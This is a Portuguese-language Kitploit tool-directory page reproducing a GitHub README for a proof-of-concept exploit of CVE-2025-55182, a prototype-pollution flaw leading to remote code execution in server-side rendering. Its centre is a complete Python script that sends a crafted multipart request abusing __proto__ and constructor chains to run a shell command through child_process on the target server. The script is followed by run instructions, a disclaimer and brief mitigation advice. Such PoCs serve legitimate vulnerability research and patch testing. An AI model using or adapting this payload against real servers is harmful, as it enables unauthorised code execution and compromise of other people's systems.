Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182-Proof-of-Concept — Prova de conceito de exploração para CVE-2025-55182, demonstrando poluição de protótipo que leva à execução remota de código em implementações de renderização no lado do servidor. Inclui script de exploração em Python e recomendações de segurança. | Kitploit
Ferramentas/GitHubGitHub/thekamran/cve-2025-55182-proof-of-concept
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubthekamran/cve-2025-55182-proof-of-concept

CVE-2025-55182-Proof-of-Concept

Prova de conceito de exploração para CVE-2025-55182, demonstrando poluição de protótipo que leva à execução remota de código em implementações de renderização no lado do servidor. Inclui script de exploração em Python e recomendações de segurança.

Ver Repositório
há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182 Prova de Conceito

Este repositório contém uma Prova de Conceito (PoC) para CVE-2025-55182, uma vulnerabilidade que envolve Poluição de Protótipo que leva à Execução Remota de Código (RCE) em determinadas implementações de renderização no lado do servidor.

⚠️ Aviso: Esta PoC é estritamente para fins educacionais, de pesquisa e testes de segurança autorizados em ambientes pessoais ou controlados. O uso não autorizado em sistemas sem permissão é ilegal.


Visão Geral da Vulnerabilidade

A vulnerabilidade ocorre quando entrada de usuário não validada é injetada em estruturas internas de objetos JavaScript (Poluição de Protótipo). Quando combinada com fluxos de execução específicos, isso pode levar à execução arbitrária de código.

Nesta PoC, propriedades encadeadas como __proto__ e constructor são usadas para elevar a poluição a um contexto de execução.


Prova de Conceito

Abaixo está o exploit.py demonstrando como a vulnerabilidade pode ser explorada:

root@kitploit:~
import requests
import json

url = "http://localhost:3000"

headers = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
    "Next-Action": "x",
}

prefix = "var res=process.mainModule.require('child_process').execSync('id').toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});"

files = {
    "0": (
        None,
        json.dumps({
            "then": "$1:__proto__:then",
            "status": "resolved_model",
            "reason": -1,
            "value": '{"then":"$B1337"}',
            "_response": {
                "_prefix": prefix,
                "_formData": {"get": "$1:constructor:constructor"}
            }
        }),
        "application/json",
    ),
    "1": (None, "\"$@0\""),
}

response = requests.post(url, headers=headers, files=files)

print("Headers:", response.headers.get('x-action-redirect'))

Como Executar

root@kitploit:~
python3 exploit.py

Certifique-se de executar isso apenas em um ambiente local ou de desenvolvimento.


Status do Patch

Se esta vulnerabilidade afetar um projeto real, verifique e instale os patches de segurança mais recentes lançados pelos mantenedores.


Recomendações de Segurança

  • Execute regularmente o npm audit e aplique o npm audit fix para manter as dependências seguras
  • Valide e sanitize toda a entrada de usuário
  • Impida o acesso a protótipos internos de objetos JavaScript
  • Use isolamento de sandbox SSR quando possível
  • Restrinja ou desative a execução de child_process em produção

Licença

Licença MIT

Baixar ferramenta